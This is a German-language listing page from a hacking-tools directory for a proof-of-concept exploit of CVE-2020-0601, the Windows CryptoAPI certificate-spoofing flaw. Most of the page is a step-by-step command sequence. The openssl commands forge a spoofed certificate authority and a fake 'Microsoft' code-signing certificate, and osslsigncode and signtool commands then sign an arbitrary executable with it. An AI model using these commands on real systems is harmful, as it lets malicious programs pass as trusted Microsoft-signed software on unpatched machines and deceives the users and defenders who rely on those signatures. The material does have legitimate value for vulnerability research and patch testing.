Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-0601 — PoC für CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall | Kitploit
Tools/GitHubGitHub/yanghaoi/cve-2020-0601
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationKryptographieBinary-Exploitation
GitHubyanghaoi/cve-2020-0601

CVE-2020-0601

PoC für CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall

Repository anzeigen
12vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-0601

Proof of Concept für CVE-2020-0601 – Windows CryptoAPI (Crypt32.dll) PoC: https://github.com/ollypwn/CurveBall

Auf Kali:

  1. PKCS12-Datei erstellen
root@kitploit:~
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt

openssl ecparam -name secp384r1 -genkey -noout -out Microsoft.key

openssl req -new -key Microsoft.key -out Microsoft.csr -config openssl_cs.conf -reqexts v3_cs

openssl x509 -req -in Microsoft.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out Microsoft.crt -days 50000 -extfile openssl_cs.conf -extensions v3_cs

openssl pkcs12 -export -in Microsoft.crt -inkey Microsoft.key -certfile spoofed_ca.crt -name "Code Signing" -out Microsoft.p12

outPk12 2. Datei signieren:

root@kitploit:~
osslsigncode sign -pkcs12 Microsoft.p12 -n "Signed by DiDi" -pass 123 -in c1.exe -out c1_Microsoft_signed.exe

Datei signieren

  1. Unter Windows Verwenden Sie signtool zum Signieren der Datei, befindet sich in "C:\Program Files (x86)\Microsoft SDKs\ClickOnce\SignTool\signtool.exe":
root@kitploit:~
signtool sign /v /f Microsoft.p12 /tr http://timestamp.digicert.com /as /fd sha256 /p 123 c1.exe

signtool.exe

*signtool.exe Globale Befehlsoptionen: /v Zeigt detaillierte Ausgabe an, unabhängig davon, ob der Befehl erfolgreich ausgeführt wurde, und zeigt Warnmeldungen an. sign Befehlsoptionen: /f Gibt das Signaturzertifikat in der Datei an. Wenn die Datei im PFX-Format (Personal Information Exchange) vorliegt und durch ein Kennwort geschützt ist, verwenden Sie die Option /p, um das Kennwort anzugeben. Wenn die Datei keinen privaten Schlüssel enthält, verwenden Sie die Optionen /csp und /kc, um den CSP und den Containernamen des privaten Schlüssels anzugeben. /tr Gibt die URL des RFC-3161-Zeitstempelservers an. Wenn diese Option (oder /t) nicht vorhanden ist, wird die signierte Datei nicht mit einem Zeitstempel versehen. Schlägt der Zeitstempelvorgang fehl, wird eine Warnung ausgegeben. Diese Option kann nicht mit der Option /t verwendet werden. /as Fügt diese Signatur hinzu. Wenn keine primäre Signatur vorhanden ist, wird diese Signatur stattdessen zur primären Signatur. /fd Gibt den Dateidigestalgorithmus an, der zum Erstellen der Dateisignatur verwendet werden soll. Der Standardwert ist SHA1. /p Gibt das Kennwort an, das beim Öffnen einer PFX-Datei verwendet werden soll. (Verwenden Sie die Option /f, um die PFX-Datei anzugeben.)

Tool herunterladen